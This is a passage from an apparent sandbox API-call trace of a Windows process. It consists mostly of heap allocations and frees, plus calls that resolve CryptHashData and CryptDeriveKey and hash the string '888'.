hHeap=0x970000) returned 1 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0257.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0257.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0257.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e18 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0257.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0257.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dc8 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0257.868] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0257.868] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0257.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0257.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0257.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0257.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51598, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0257.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0257.870] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0257.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.870] CryptHashData (hHash=0xa87350, pbData=0x2e54df8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0257.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0257.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.871] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56060 | out: hHeap=0x970000) returned 1 [0257.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0257.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0257.871] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0257.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0257.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0257.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0257.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0257.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0257.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.872] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0257.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0257.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0257.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0257.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0257.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0257.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0257.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0257.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0257.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0257.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0257.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0257.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0257.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0257.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0257.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0257.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0257.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0257.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0257.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51850 [0257.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51850, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0257.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0257.877] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0257.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0257.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 